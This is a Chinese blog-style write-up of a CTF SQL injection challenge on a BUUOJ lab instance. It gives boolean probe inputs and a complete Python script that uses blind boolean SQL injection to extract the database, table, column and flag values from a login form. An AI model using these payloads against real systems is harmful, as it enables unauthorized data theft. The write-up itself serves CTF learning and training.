热门标签
热门文章
- 1自己对蓝桥杯的一点认识以及如何备赛总结_大三参加蓝桥杯晚吗
- 2QQ/微信防撤回插件
- 3idea集成Gitee详细步骤_idea整合gitee
- 4vscode找回代码
- 5模拟集成电路设计:Bandgap电路设计及版图实现
- 6Ubuntu 22.04 下安装 MySQL 8.0.30 以及 MySQL Workbench连接等问题_mysql-workbench-community-dbgsym
- 7常用的python库_textfilter 怎样使用
- 8python软件哪个版本好用,python哪个版本用得最多_python更新到哪个版本了
- 9实验室安全 考试 题库_如果得知有火,实验指导教师
- 10idea的这款代码提示插件爱了_idea ai代码提示插件
当前位置: article > 正文
[第一章 web入门]SQL注入-2
作者:花生_TL007 | 2024-04-11 17:51:20
赞
踩
第一章 web入门]sql注入-2
[第一章 web入门]SQL注入-2
- bool盲注
访问name=admin’ or 1=1#
访问name=admin’ or 1=0#
发现页面回显不同
1=1
1=0
payload
import requests import time url = 'http://eb258849-cbb2-4dfa-9b41-b0a067c60d6b.node5.buuoj.cn:81/login.php' flag = '' for i in range(1, 1000): high = 127 low = 32 mid = (low + high) // 2 while high > low: # payload = f"1' or ascii(substr(database(),{i},1))>{mid}#" #查库 #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#" #查表 #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#" #查列 payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#" #查数据 data = { "name":payload, "pass":'qwer' } time.sleep(0.1) response = requests.post(url, data = data) if 'u6216' in response.text: low = mid + 1 else: high = mid mid = (low + high) // 2 if low != 32 : flag += chr(int(low)) else: break print(flag)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/406483
推荐阅读
相关标签
